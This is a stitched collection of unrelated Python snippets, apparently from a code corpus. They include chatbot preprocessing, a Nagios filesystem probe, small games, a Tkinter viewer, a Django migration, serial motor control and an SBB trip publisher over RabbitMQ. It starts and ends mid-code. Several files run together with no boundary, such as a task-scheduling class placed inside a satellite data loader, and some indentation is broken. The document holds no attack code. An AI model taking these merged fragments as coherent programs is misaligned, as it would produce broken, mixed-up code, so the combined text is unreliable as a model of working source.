for answer in clean_answers:
    ints = []
    for word in answer.split():
        if word not in answerwords2int:
            ints.append(answerwords2int['<OUT>'])
        else:
            ints.append(answerwords2int[word])
    answers_to_int.append(ints)
# Sorting both the questions and answers by the lenght of the questions
# (only questions up to 25 tokens long are kept).
sorted_clean_questions = []
sorted_clean_answers = []
for length in range(1, 25 + 1):
    for i in enumerate(questions_to_int):
        if len(i[1]) == length:
            sorted_clean_questions.append(questions_to_int[i[0]])
            sorted_clean_answers.append(answers_to_int[i[0]])
############# PART 2 - BUILDING THE SEQ2SEQ MODEL ##############
# Creating the placeholders for input and targhets
def model_inputs():
    """Create the TF1 placeholders fed at train time.

    Returns (inputs, targets, lr, keep_prob): int32 [batch, seq] tensors
    for encoder inputs and targets, plus float32 scalars for the
    learning rate and dropout keep probability.
    """
    # Arguments: placeholder(type of input, matrix dimension, name of input)
    inputs = tf.placeholder(tf.int32, [None, None], name = 'input')
    targets = tf.placeholder(tf.int32, [None, None], name = 'target')
    lr = tf.placeholder(tf.float32, name = 'learning_rate')
    keep_prob = tf.placeholder(tf.float32, name = 'keep_prob')
    return inputs, targets, lr, keep_prob
# Processing the targets
def preprocess_targets(targets, word2int, batch_size):
    """Build the decoder input batch: prepend <SOS> to every target
    sequence and drop its last token (standard teacher forcing shift)."""
    # Arguments: tf.fill(size of the matrix, fill value)
    left_side = tf.fill([batch_size, 1], word2int['<SOS>'])
    # Keep all rows, drop the final column of each target sequence.
    right_side = tf.strided_slice(targets, [0,0], [batch_size, -1], [1,1])
    preprocessed_targets = tf.concat([left_side, right_side], 1)
    return preprocessed_targets
# Creating the Encoder RNN Layer
|
# -*- coding: utf-8 -*-
__author__ = 'Tan Chao'
'''
Test logger_manager module.
'''
from logger_manager import LoggerManager
# Exercise each log level, then force an exception to test log_except().
logger = LoggerManager.get_logger('test')
logger.info('start...')
logger.debug('hello world')
logger.error('stop error')
try:
    print(2/0)
except Exception:
    # Fix: `except Exception, e` is Python-2-only syntax (and the bound
    # name was never used); this form works on Python 2.6+ and 3.x.
    logger.log_except()
from difflib import SequenceMatcher

# Compare two text files and print their similarity as a percentage.
with open("1.txt") as f1, open("2.txt") as f2:
    f1Data = f1.read()
    f2Data = f2.read()
# Bug fix: the class is SequenceMatcher — the original called the
# non-existent name `SequenceMaster`, which raised NameError.
# (First arg None = no "junk" heuristic for ratio().)
similarity = SequenceMatcher(None, f1Data, f2Data).ratio()
print(similarity*100)
|
# %% imports
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.animation as animation
plt.ion()
import sys
import time
import pathlib
import numpy as np
import serial
import pandas as pd
from generated import *
# Provenance of the generating code (this file is machine-generated).
_code_git_version="66e6811232d925e0f4a0f5c8f0da62125ed58de6"
_code_repository="https://github.com/plops/cl-py-generator/tree/master/example/26_copernicus_xsd/source/run_00_load_data.py"
_code_generation_time="19:41:48 of Friday, 2020-10-23 (GMT+1)"
# Sentinel-1 RAW .dat files inside extracted .SAFE products — presumably
# the Copernicus download layout; confirm against the data directory.
fns=list(pathlib.Path("./").glob("S1*RAW*.SAFE/*.dat"))
# Definition of a class to abstractly represent the tasks we will need
# to order/schedule.
class Tarefa:
    # NOTE: these are class-level attributes acting as defaults; assigning
    # through an instance creates an instance attribute that shadows them.
    nome = ""    # task name
    inicio = 0   # start time
    fim = 0      # end time
"""
Examen Parcial 1
Carrillo Medina Alexis Adrian (CMAA)
Nombre del programa: Parcial1.py
NOTA: La finalidad de este archivo es hacer las respectivas pruebas.
Los algoritmos se encuentran en matrices/Matriz.py
Se probo usando linux.
"""
#----- Seccion de bibliotecas
from matrices import Matriz
#----- Codigo
if __name__=="__main__":
    # Interactive test driver for the Matriz class: build an n x m
    # matrix, then print it, its inverse, and an arbitrary power of it.
    print("")
    # Build the n x m matrix (initialised with zeros).
    # NOTE(review): n is prompted as 'columnas' but used as the first
    # loop index — verify row/column order against Matriz.
    n=int(input("Ingresa el numero de columnas: \n"))
    m=int(input("Ingresa el numero de filas: \n"))
    Mat=Matriz.Matriz(n,m,Zeros=True)
    # Read the matrix elements one by one.
    print("")
    print ("Ingrese los elementos de la matriz")
    for i in range(n):
        for j in range(m):
            Mat.changeElement(i,j,float(input("Elemento (%2d,%2d): " % (i, j))))
    # Print the matrix.
    print("\nLa matriz es")
    Mat.toString()
    # Compute and print the inverse.
    print("\nSu inversa es")
    Mat.matrizInversa().toString()
    # Compute and print the p-th power.
    print("\n")
    p=int(input("Ingrese la potencia "))
    print("La Matriz a la potencia %d es" %(p))
    Mat.potencia(p).toString()
    print("")
import os

here = os.path.dirname(os.path.abspath(__file__))
print(here)
# Read the decision-tree policy and collapse it to one line, terminating
# each original line with a literal backslash-n ("\n" as two characters).
filename = os.path.join(here, 'dt_policy_8.txt')
# `with` guarantees the handle is closed even on error (the original
# used bare open/close); join avoids quadratic string concatenation.
with open(filename, "r") as f:
    s = "".join(line.strip() + "\\n" for line in f)
# Write the flattened representation next to the source file.
filename = os.path.join(here, 'dt_policy_8_string.txt')
with open(filename, "w") as f:
    f.write(s)
|
from alarm import alarm
from config import data
data = data.Data()
def symbol_to_string():
    """Rewrite the configured alarm string with '%' spelled out."""
    # str.replace is a no-op when '%' is absent, so the original
    # if/else branch collapses to a single unconditional call.
    spelled_out = data.alarm.replace('%', ' percentage ')
    alarm.write_alarm(spelled_out)
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2011.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : check_dpm_filesystem
#
# DESCRIPTION : Checks the filesystem freespace and status
#
# AUTHORS : Alexandre.beche@cern.ch
#
##############################################################################
import os
import re
from lcgdmcommon import *
class check_dpm_filesystem:
    """Nagios probe: checks free space and status of DPM pool filesystems."""
    __version__ = "0.0.1"
    __nagios_id__ = "DM-POOL"
    # Defaults options
    DEFAULT_WARNING = "30"
    DEFAULT_CRITICAL = "15"
    DEFAULT_DETAILS = "critical"
    DEFAULT_STATE = "ALL"
    DEFAULT_UNITS = None
    # Defaults states
    DEFAULT = 0
    DISABLED = 1
    RDONLY = 2
    # Specific parameters, where key = short, value = long (i.e. {"h":"help", "C:":"command="})
    # getopt format. The long version will be the one passed even when the short is specified
    __additional_opts__ = {"w:": "warning=",
                           "c:": "critical=",
                           "d:": "details=",
                           "p:": "pools=",
                           "s:": "state=",
                           "u:": "units="}
    # Specific usage information
    __usage__ = """
\t-w, --warning\tSets the warning limit for free space. It can be two values: pool. It accepts suffixes. (e.g. -w 100G). Default %s.
\t-c, --critical\tSets the critical limit for free space. It can be two values: pool. It accepts suffixes. (e.g. -c 50G). Default %s.
\t-d, --details\tDefault level of details in the performance data output. Possible values: critical, warning, all. (Default: %s).
\t-p, --pools\tRestricts the pools to check to a list sparated by commas. (e.g. pool1,pool2)
\t-s, --state\tRestricts the fs state to check to a list sparated by commas. (e.g. RDONLY,DISABLED,ALL)
\t-u, --units\tAll sizes are output in these units: (k)ilobytes, (m)egabytes, (g)igabytes, (t)erabytes, (p)etabytes. Capitalise to use multiples of 1000 (S.I.) instead of 1024.
Retreive DPM FS informations.
""" % (DEFAULT_WARNING, DEFAULT_CRITICAL, DEFAULT_DETAILS)
    # Methods
    def __init__(self, opt = {}, args = []):
        """
        Constructor
        @param opt Contains a dictionary with the long option name as the key, and the argument as value
        @param args Contains the arguments not associated with any option
        """
        # Pools
        self.pools = None
        if "pools" in opt:
            self.pools = opt["pools"].split(',')
        # BUG FIX: the original re-assigned `self.pools = None` at the
        # very end of __init__, silently discarding the --pools option
        # so the pool filter in main() never applied.
        # States
        self.state = [self.DEFAULT_STATE]
        if "state" in opt:
            self.state = opt["state"].split(",")
        # Get other options (fall back to class defaults).
        opt_warning = self.DEFAULT_WARNING
        opt_critical = self.DEFAULT_CRITICAL
        opt_details = self.DEFAULT_DETAILS
        opt_units = self.DEFAULT_UNITS
        if "warning" in opt:
            opt_warning = opt["warning"]
        if "critical" in opt:
            opt_critical = opt["critical"]
        if "details" in opt:
            opt_details = opt["details"]
        if "units" in opt:
            opt_units = opt["units"]
        # Thresholds are percentages of each filesystem's capacity.
        self.warning = real_bytes(opt_warning)
        self.critical = real_bytes(opt_critical)
        self.details = opt_details
        self.units = opt_units
    # if the --pools option is set, restrain the results to that list
    def filter_pools(self, pool_array):
        """Keep only the pools whose name appears in self.pools."""
        filtering_pool_array = []
        for pool in pool_array:
            if pool.poolname in self.pools:
                filtering_pool_array.append(pool)
        return filtering_pool_array
    def main(self):
        """
        Test code itself. May raise exceptions.
        @return A tuple (exit code, message, performance)
        """
        return_code = EX_OK
        import dpm
        # Get pools
        (stat, pool_array) = dpm.dpm_getpools()
        if stat != 0:
            return (EX_UNKNOWN, "Could not get the pools (%d)" % dpm.C__dpm_errno(), None)
        # if the --pools option is set, restrain the results to that list
        if self.pools is not None:
            pool_array = self.filter_pools(pool_array)
        critical, warning = 0, 0
        critical_fs, warning_fs = "", ""
        fs_summary = {}
        # For each pool, retreive the list of filesystem
        for pool in pool_array:
            _, filesystems = dpm.dpm_getpoolfs(pool.poolname)
            for fs in filesystems:
                fs_name, fs_capacity, free_space = fs.fs, fs.capacity, fs.free
                warning_threshold, critical_threshold = (self.warning * fs_capacity / 100), (self.critical * fs_capacity / 100)
                # Keep only FS with the wanted state (or ALL if flag set)
                if ("ALL" not in self.state) and (fs.status not in self.state):
                    continue
                # Case of critical state detected
                if fs.free < critical_threshold:
                    if return_code < EX_CRITICAL:
                        return_code = EX_CRITICAL
                    critical += 1
                    if self.details in ["all", "critical", "warning"]:
                        fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
                # Case of warning state detected
                elif fs.free < warning_threshold:
                    if return_code < EX_WARNING:
                        return_code = EX_WARNING
                    warning += 1
                    if self.details in ["all", "warning"]:
                        fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
                elif self.details == "all":
                    fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
        # Build the Nagios performance-data string:
        # label=value[unit]B;warn;crit;0;capacity
        performance_data = ""
        # .items() instead of the Python-2-only .iteritems() so the probe
        # also runs under Python 3.
        for key, value in fs_summary.items():
            performance_data += key
            performance_data += "="
            performance_data += str(standard_units(value[0], self.units))
            if self.units is not None:
                performance_data += str(self.units)
            performance_data += "B;"
            performance_data += str(standard_units(value[1], self.units)) + ";"
            performance_data += str(standard_units(value[2], self.units)) + ";0;"
            performance_data += str(standard_units(value[3], self.units)) + " "
        return_data = str(critical) + " criticals and " + str(warning) + " warnings"
        return (return_code, return_data, performance_data)
# When called directly
if __name__ == "__main__":
run(check_dpm_filesystem)
|
import random
score = 0
arr = ["rock", "paper", "scissors"]
def gameThree():
    """Play exactly three rounds of rock-paper-scissors."""
    for _round in range(3):
        game()
def game():
    """Play one round against the computer and print the outcome.

    Reads the player's move from stdin, prints the computer's move and
    the result, and increments the module-level `score` on a win.
    """
    # Bug fix: the original wrote `score + 1`, an expression whose result
    # was discarded — wins were never counted. We need `global` to
    # rebind the module-level counter.
    global score
    comp = randomPlay()
    print(comp)
    x = input("rock paper scissors shoot !!!!")
    # Map each move to the move it defeats.
    beats = {"rock": "scissors", "paper": "rock", "scissors": "paper"}
    if x in beats:
        if comp == x:
            print("tie")
        elif comp == beats[x]:
            print("you won")
            score += 1
        else:
            print("you lost")
    print(score)
def randomPlay():
    """Return the computer's move, drawn uniformly from `arr`."""
    # random.choice presumably draws through the same internal path as
    # randrange(0, len(arr)) — either way the distribution is uniform.
    return random.choice(arr)
gameThree()
|
# Read a sentence, strip common punctuation, and print every word whose
# length is even. str.translate deletes the same four characters the
# original removed with chained .replace() calls.
s2 = list(input("s = ").translate(str.maketrans("", "", ",.'\"")).split())
for word in s2:
    if len(word) % 2 == 0:
        print(word)
from tkinter import *
from PIL import ImageTk,Image
# Simple Tkinter image viewer: one image label plus back/forward buttons.
root = Tk()
root.title('images - tutorial')
# NOTE(review): iconbitmap fails here for an unclear reason
# (.ico handling is platform-dependent) — TODO confirm.
root.iconbitmap('images/diablo.ico')
# Pre-load all images; PhotoImage objects must outlive the labels.
img_1 = ImageTk.PhotoImage(Image.open('images/test.png'))
img_2 = ImageTk.PhotoImage(Image.open('images/fireMario_PF.png'))
img_3 = ImageTk.PhotoImage(Image.open('images/filter.png'))
img_list = [img_1, img_2, img_3]
img_nmr = 0  # index of the currently displayed image
img_label = Label(image=img_1)
img_label.grid(row=0, column=0,columnspan=3)
def forward():
    """Advance the viewer to the next image (no-op at the last image)."""
    global img_nmr, img_label
    if img_nmr != len(img_list)-1:
        img_nmr += 1
        # Replace the label wholesale rather than reconfiguring it.
        img_label.grid_forget()
        img_label = Label(image=img_list[img_nmr])
        img_label.grid(row=0, column=0,columnspan=3)
def backward():
    """Step the viewer back to the previous image (no-op at the first)."""
    global img_nmr, img_label
    if img_nmr != 0:
        img_nmr -= 1
        # Replace the label wholesale rather than reconfiguring it.
        img_label.grid_forget()
        img_label = Label(image=img_list[img_nmr])
        img_label.grid(row=0, column=0,columnspan=3)
# Navigation buttons under the image: back, quit, forward.
button_back = Button(root, text = '<<', command = lambda: backward())
button_exit = Button(root, text = 'EXIT PROGRAM', command=root.quit)
button_forw = Button(root, text = '>>', command = lambda: forward())
button_back.grid(row=1,column=0)
button_exit.grid(row=1,column=1)
button_forw.grid(row=1,column=2)
root.mainloop()
# Generated by Django 2.2 on 2020-10-04 14:09
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 2.2): redefine SocInstaProxy.location as a
    nullable CharField(max_length=200) with verbose name 'Location'."""
    dependencies = [
        ('instagram', '0009_auto_20201004_1708'),
    ]
    operations = [
        migrations.AlterField(
            model_name='socinstaproxy',
            name='location',
            field=models.CharField(max_length=200, null=True, verbose_name='Location'),
        ),
    ]
|
'''
657. Judge Route Circle
Initially, there is a Robot at position (0, 0). Given a sequence of its moves, judge if this robot makes a circle, which means it moves back to the original place.
The move sequence is represented by a string. And each move is represent by a character. The valid robot moves are R (Right), L (Left), U (Up) and D (down). The output should be true or false representing whether the robot makes a circle.
Example 1:
Input: "UD"
Output: true
Example 2:
Input: "LL"
Output: false
'''
def judgeCircle(self, moves):
    """
    :type moves: str
    :rtype: bool

    The robot returns to the origin iff horizontal moves cancel out
    (count of R equals count of L) and vertical moves cancel out
    (count of U equals count of D).
    """
    # Fixes vs the original: removes the Python-2-only `print moves_hash`
    # debug statement (a SyntaxError under Python 3) and no longer raises
    # KeyError when `moves` contains a character outside R/L/U/D.
    return (moves.count("R") == moves.count("L")
            and moves.count("U") == moves.count("D"))
# Compute birth year from the user's age.
# NOTE(review): assumes the current year is 2021 and that the birthday
# has already passed this year.
age = int(input('Please input your age: '))
yearBorn = 2021 - age
print(yearBorn)
import serial
import numpy as np
import cv2
def send_commends(ser, motors, commands):
    """Send every (motor, direction) pair over the serial link.

    Each command is a 2-byte frame: [motor id, direction code].
    Motor ids: 2 = motor 1, 4 = motor 2, 8 = motor 3.
    Direction codes: 2 = forward, 4 = backward, 8 = release.

    :param ser: open serial port (anything with a .write(bytes) method)
    :param motors: iterable of motor ids
    :param commands: iterable of direction codes
    """
    for motor_id in motors:
        for direction in commands:
            frame = bytearray((motor_id, direction))
            print(frame)  # same bytearray repr the original printed
            ser.write(bytes(frame))  # write a string
def test_dc_motors():
    """Interactive DC-motor test harness driven by an OpenCV window.

    Keys: '2'/'4'/'8' toggle a motor on/off, 'w'/'s'/'x' select the
    direction command (forward/release/backward), 'q' quits.
    """
    motors = set()
    commands = []
    # ser = serial.Serial('COM5') # open serial port
    ser = serial.Serial('/dev/ttyUSB1') # open serial port
    print(ser.name) # check which port was really used
    while True:
        # Blank window just to capture keyboard focus for waitKey.
        img = np.zeros((200, 200), np.uint8)
        cv2.imshow('Main', img)
        key = cv2.waitKey(2)
        if key > 0:
            key = chr(key)
            # Bug fix: after chr(), `key` is a str, so the original test
            # `key in [ord('q')]` compared str to int and never matched —
            # the loop could not be quit with 'q'.
            if key == 'q':
                break
            if key in ['2', '4', '8']:
                motor = int(key)
                # Toggle the motor in/out of the active set.
                if motor in motors:
                    motors.remove(motor)
                else:
                    motors.add(motor)
            if key == 'w':
                commands = [2]
            if key == 's':
                commands = [8]
            if key == 'x':
                commands = [4]
            print(key, list(motors), commands)
            send_commends(ser, motors, commands)
    ser.close()
test_dc_motors()
|
import math  # NOTE(review): unused import
# Ask for a number and print it in the chosen base (binary/octal/hex);
# the [2:] slice strips the '0b'/'0o'/'0x' prefix.
num = int(input('Digite um número: '))
print('---------------------------------')
print('[1] Binário')
print('[2] Octal')
print('[3] Hexadecimal')
conv = int(input('Digite a base de conversão: '))
if conv == 1:
    print('O número em binário é: {}'.format(bin(num)[2:]))
elif conv == 2:
    print('O número em octal é: {}'.format(oct(num)[2:]))
else:
    # NOTE(review): any value other than 1 or 2 (not just 3) falls
    # through to hexadecimal — invalid menu choices are not rejected.
    print('O número em hexadecimal é: {}'.format(hex(num)[2:]))
|
#program to print the fibonaccci series
# NOTE(review): Python-2 code — the `print x,` statements and `input()`
# returning an int are Python-2-only semantics; do not run under Python 3.
n=input('Enter no of digits :-')
first=0
second=1
print first,second,
count=3
while count<=n:
    # Slide the (first, second) window forward one term at a time.
    third=first+second
    print third,
    first=second
    second=third
    count=count+1
|
# Core python
import logging
import os
import pika
import uuid
import xml.etree.cElementTree as ET
import datetime
from datetime import timedelta
import ast
import json
# sci stack
import pandas as pd
import numpy as np
# Vibe
from rabbit_publisher_consumer import PublisherBot
# SBB
import itinerary
import init_data_struct as ids
import xml_path
import remove_itineraries as ri
TRIP_CACHE = dict()
LEG_SUB_TYPES = ['S','IR','R','RE','EC','RJ','ICE','IC','ICN','VAE','TGV']
def roundTime(dt=None, dateDelta=datetime.timedelta(minutes=1), to='average'):
    """Round a datetime object to a multiple of a timedelta.

    dt : datetime.datetime object, default now.
    dateDelta : timedelta object, we round to a multiple of this, default 1 minute.
    to : 'up', 'down' or anything else for nearest (half rounds up).

    Note: with to='up', a value already on a multiple is pushed to the
    NEXT multiple (seconds + roundTo is floor-divided).

    Author: Thierry Husson 2012 - Use it as you want but don't blame me.
            Stijn Nevens 2014 - Changed to use only datetime objects as variables
    """
    roundTo = dateDelta.total_seconds()
    # BUG FIX (idiom): compare against None with `is`, not `==`.
    if dt is None:
        dt = datetime.datetime.now()
    # Seconds elapsed within the current day (timedelta.seconds is day-local).
    seconds = (dt - dt.min).seconds
    if to == 'up':
        rounding = (seconds + roundTo) // roundTo * roundTo
    elif to == 'down':
        rounding = seconds // roundTo * roundTo
    else:
        # // is a floor division, not a comment on following line:
        rounding = (seconds + roundTo / 2) // roundTo * roundTo
    # Also drops any microsecond component.
    return dt + datetime.timedelta(0, rounding - seconds, -dt.microsecond)
def check_trip_cache(params, max_res, leave_at):
    """Look up a cached SBB response for the given query parameters.

    Returns the cached response, or None when this exact query has not
    been seen.  As a crude eviction policy the whole cache is wiped
    (after the lookup) once it grows past 10000 entries.
    """
    cache_key = (
        params['from_lat'],
        params['from_lon'],
        params['to_lat'],
        params['to_lon'],
        params['rounded_timestamp'],
        max_res,
        leave_at,
    )
    cached_response = TRIP_CACHE.get(cache_key)
    # periodic clearing - we can probably figure out a better way to do this
    if len(TRIP_CACHE) > 10000:
        TRIP_CACHE.clear()
    return cached_response
class SBBPublisherBot(PublisherBot):
    """RabbitMQ publisher for SBB API request XML.

    Publishes one XML request per (MaxResultNumber, leave_at) pair; when an
    identical query is already in TRIP_CACHE the stored response is pushed
    directly to the response exchange instead of issuing a new request.
    """
    def publish(self, trip, loop_through, exchange, routing_key):
        # XML request template shipped alongside this module.
        xml_str_fname = os.path.dirname(os.path.realpath(__file__)) + '/xml/sbb_api.xml'
        request_exchange, response_exchange = exchange[0], exchange[1]
        for l in loop_through:
            # l is a (max_result_number, leave_at) pair of *strings*,
            # e.g. ("6", "True") -- hence the int()/literal_eval here.
            params = trip.gen_param_seg(MaxResultNumber=int(l[0]), leave_at=ast.literal_eval(l[1]))
            req_xml = trip.gen_query_xml_str(params, xml_str_fname)
            max_res = l[0]
            leave_at = l[1]
            # The uuid ties the eventual response back to this trip/request combo.
            msg = {"uuid": trip.batch_id + "_" + trip.trip_id + "_" + max_res + "_" + leave_at, "xml": req_xml}
            # Remember the generated params so the response handler can cache them.
            trip.params[(max_res, leave_at)] = params
            properties = pika.BasicProperties(app_id='example-publisher',
                                              content_type='application/json',
                                              headers=msg)
            resp = check_trip_cache(params, max_res, leave_at)
            if resp:
                # Cache hit: short-circuit straight to the response exchange.
                logging.debug("Duplicate trip, sending XML response")
                json_resp = {"uuid": trip.batch_id + "_" + trip.trip_id + "_" + max_res + "_" + leave_at, "xml": resp}
                self.pub_channel.basic_publish(response_exchange, routing_key, json.dumps(json_resp, ensure_ascii=True).encode('utf8'),
                                               properties)
            else:
                # channel.basic_publish('spf_request_exchange', 'spf_response_queue', json.dumps(msg, ensure_ascii=True), properties)
                self.pub_channel.basic_publish(request_exchange, routing_key, json.dumps(msg, ensure_ascii=False).encode('utf8'),
                                               properties)
class Trip(object):
    """One observed trip plus all SBB itinerary data gathered for it.

    Owns the request-parameter grid, the collected Itinerary objects and
    the pandas dataframes (trip-link / itinerary / legs / segments) built
    from the API responses.
    """
    def __init__(self, trip, batch_id, CONFIG):
        self.config = CONFIG
        # Raw trip record: coordinates, start/end times, vid, mot_segment_id.
        self.trip = trip
        self.trip_id = str(uuid.uuid4())
        self.batch_id = batch_id
        self.trip_link_df, self.itinerary_df, self.legs_df, self.segments_df = ids.initialize_all_empty_df()
        self.itineraries = []
        # self.request_params = [(6, True), (6, False), (-6, True), (-6, False)]
        # key here - 0 = Started, 1 = in process, 2 = finished
        self.request_params = {("6", "True") : 0, ("6", "False") : 0, ("-6", "True") : 0, ("-6", "False") : 0}
        self.requests_processed = 0
        # (max_res, leave_at) -> generated query parameters, filled at publish time.
        self.params = dict()
        self.pub_creds = {'rabbit_user': self.config.get('rabbit', 'rabbit_user'),
                          'rabbit_pw': self.config.get('rabbit', 'rabbit_pw'),
                          'rabbit_host': self.config.get('rabbit', 'rabbit_host'),
                          'rabbit_port': int(self.config.get('rabbit', 'rabbit_port'))}

    def publish(self, publish_params):
        """Publish the given (max_res, leave_at) request specs over RabbitMQ."""
        # this is our little sub-pub bot that handles publishing requests and listening for responses
        bot = SBBPublisherBot(self.pub_creds)
        bot.publish(self, publish_params, ["spf_request_exchange", "spf_response_exchange"], '')
        # stop the publisher
        bot.stop_publisher()
        # remove
        del bot

    def publish_reqs(self):
        """Publish the full default grid of requests for this trip."""
        logging.debug("Publishing requests for trip %s" % self.trip_id)
        self.publish(self.request_params.keys())

    def republish_req(self, publish_param):
        """Re-publish a subset of requests (e.g. after a failed attempt)."""
        logging.debug("Republishing request for trip %s" % self.trip_id)
        self.publish(publish_param)

    def complete_processing(self):
        """Merge per-itinerary dataframes and finalize the trip-link index."""
        # concat stuff
        self.concat_trip_dfs()
        self.concat_legs_dfs()
        self.concat_seg_dfs()
        if not self.trip_link_df.empty:
            self.trip_link_df['vid'] = self.trip['vid']
            self.trip_link_df['mot_segment_id'] = self.trip['mot_segment_id']
            # Not using vid / mot_segment_id as indexes since they're identical for all...
            # Hierarchical indexes need to be sorted for faster operation (uses np.searchsorted )
            self.trip_link_df.sort_values(['itinerary_id', 'leg_id', 'segment_id', ], inplace=True)
            self.trip_link_df.set_index(['itinerary_id', 'leg_id', 'segment_id', ], inplace=True)

    def gen_param_seg(self, MaxResultNumber=3, leave_at=True, api_version='v2'):
        """Build the query-parameter dict for one SBB API request."""
        # Some parameters need a bit of reformatting
        params = {
            'api_version': api_version,  # check, there might some other dependencies inside the XML...
            'MaxResultNumber': MaxResultNumber,
            'from_lat': int(round(self.trip['lat_start'] * 10 ** 6)),  # int, lat/lon * 1e6
            'from_lon': int(round(self.trip['lon_start'] * 10 ** 6)),
            'to_lat': int(round(self.trip['lat_end'] * 10 ** 6)),
            'to_lon': int(round(self.trip['lon_end'] * 10 ** 6)),
            # These times are used by python but not for the XML query so no reformat
            'trip_time_start': self.trip['trip_time_start'],  # previously starttriptime
            'trip_time_end': self.trip['trip_time_end']  # previously endtriptime
        }
        # Rounding direction follows the sign of MaxResultNumber
        # (presumably the search direction -- TODO confirm).
        if MaxResultNumber > 0:
            rounding = "down"
        else:
            rounding = "up"
        if leave_at:  # calculate trip to start at this time
            params['timestamp'] = self.trip['time_start'].strftime(
                "%Y-%m-%dT%H:%M:%S")  # timestamp format: 2015-08-04T14:00:00
            params['DateTimeType'] = 'ABFAHRT'
            params['rounded_timestamp'] = roundTime(self.trip['time_start'], to=rounding)
        else:  # calculate trip to arrive by this time
            params['timestamp'] = self.trip['time_end'].strftime(
                "%Y-%m-%dT%H:%M:%S")  # timestamp format: 2015-08-04T14:00:00
            params['DateTimeType'] = 'ANKUNFT'
            params['rounded_timestamp'] = roundTime(self.trip['time_end'], to=rounding)
        params['mot_segment_id'] = self.trip['mot_segment_id']
        return params

    def gen_query_xml_str(self, params, xml_str_fname):
        """
        XML query that calls the SBB API
        params are the lat/lon/timestamp/MaxResultNumber which specify the query
        """
        if os.path.isfile(xml_str_fname):
            with open(xml_str_fname, "r") as myfile:
                request_str = myfile.read()
            return request_str.format(**params)
        else:
            logging.error('XML template file not found at: {p}'.format(p=xml_str_fname))
            raise IOError

    def build_single_itinerary(self, response, max_res, leave_at):
        """
        Takes in the XML response and turns it into an etree. Then builds tables containing itinerary/leg/segment including
        the node in the tree where they reside.
        The build_ functions then populate all fields of the dataframes with the data associated with that node in the
        etree. All the paths for the various fields are stored as functions in the xml_path.py file.
        Unique IDs are associated to each item (i/l/s) using a uuid4() generator.
        :param response: XML response content from the SBB API call
        """
        # root = ET.fromstring(response.response.content)
        # we are processing now
        self.request_params[(max_res, leave_at)] = 1
        params = self.params.get((max_res, leave_at))
        if params:
            # Store the raw response for identical future queries.
            TRIP_CACHE[(params['from_lat'], params['from_lon'], params['to_lat'], params['to_lon'], params['rounded_timestamp'], max_res, leave_at)] = response.response
        root = ET.fromstring(response.response)
        # Extracts the nodes corresponding to itineraries from the tree
        itinerary_nodes = response.get_itinerary_nodes(root)
        # Removes itineraries that have been previously added to this trip
        itinerary_nodes = self.skip_duplicates_itineraries(itinerary_nodes, self.itinerary_df['context_reconstruction'].values, response)
        # itinerary_nodes = ri.skip_duplicates_itineraries(itinerary_nodes,
        #                                                  self.itinerary_df['context_reconstruction'].values)
        # Remove itineraries that overlap with previous/next visit by more than (buffer), a quantity found in CONFIG
        itinerary_nodes = self.skip_visit_overlap_itineraries(self.trip, itinerary_nodes, response)
        # remove bad nodes
        itinerary_nodes = self.remove_unneeded_nodes(itinerary_nodes, response)
        self.requests_processed += 1
        # Only add a new itinerary if there are any nodes
        if len(itinerary_nodes) != 0:
            new_itinerary = itinerary.Itinerary(itinerary_nodes, self.config, response)
            self.itineraries.append(new_itinerary)
            # concat the itinerary df because we need it for future itineraries
            self.itinerary_df = pd.concat([self.itinerary_df, new_itinerary.itinerary_df])
        # we are done processing
        self.request_params[(max_res, leave_at)] = 2

    def concat_trip_dfs(self):
        """Concatenate per-itinerary trip-link dataframes into trip_link_df."""
        self.trip_link_df = pd.concat([self.trip_link_df] + [x.trip_link_df for x in self.itineraries], ignore_index=True)

    def concat_legs_dfs(self):
        """Concatenate per-itinerary legs dataframes into legs_df."""
        self.legs_df = pd.concat([self.legs_df] + [x.legs_df for x in self.itineraries])

    def concat_seg_dfs(self):
        """Concatenate per-itinerary segment dataframes into segments_df."""
        self.segments_df = pd.concat([self.segments_df] + [x.segments_df for x in self.itineraries])

    def skip_duplicates_itineraries(self, itinerary_nodes, previous_itineraries_cr, response):
        """Drop nodes whose context_reconstruction is already in this trip."""
        # Do not recalculate itineraries already included in that trip
        itinerary_nodes = [node for node in itinerary_nodes
                           if not np.in1d(response.get_itin_context_reconstruction(node), previous_itineraries_cr)]
        return itinerary_nodes

    def skip_visit_overlap_itineraries(self, trip, itinerary_nodes, response):
        """Keep only itineraries inside the trip window plus a configured buffer."""
        time_buffer = timedelta(minutes=int(self.config.get('params', 'VISIT_TIME_OVERLAP_BUFFER')))
        min_time = trip['trip_time_start'] - time_buffer
        max_time = trip['trip_time_end'] + time_buffer
        itinerary_nodes = [node for node in itinerary_nodes
                           if (response.get_itin_start_datetime(node) > min_time) and
                           (response.get_itin_end_datetime(node) < max_time)]
        return itinerary_nodes

    def remove_unneeded_nodes(self, itinerary_nodes, response):
        """Drop itineraries containing any leg that fails check_legs."""
        itinerary_nodes = [node for node in itinerary_nodes if self.check_legs(node, response)]
        return itinerary_nodes

    def check_legs(self, node, response):
        """Return True only if every leg is a footpath (FUSSWEG), has an
        allowed route category (LEG_SUB_TYPES), or lasts <= 5 minutes."""
        for leg in response.get_leg_nodes(node):
            if response.get_leg_type(leg) == "FUSSWEG" or response.get_leg_route_category(leg) in LEG_SUB_TYPES or\
                    (response.get_leg_time_end(leg) - response.get_leg_time_start(leg)) <= timedelta(minutes=5):
                continue
            else:
                return False
        return True
|
print()
print('*************************************************************************')
print('                           LANGUAGE CONVERTER                            ')
print('*************************************************************************')

# Alien-word -> English phrase dictionary.
converter = {'aeo': 'Hi',
             'eooae': 'How are you',
             'babaubb': 'I\'m fine',
             'chonon': 'sunny',
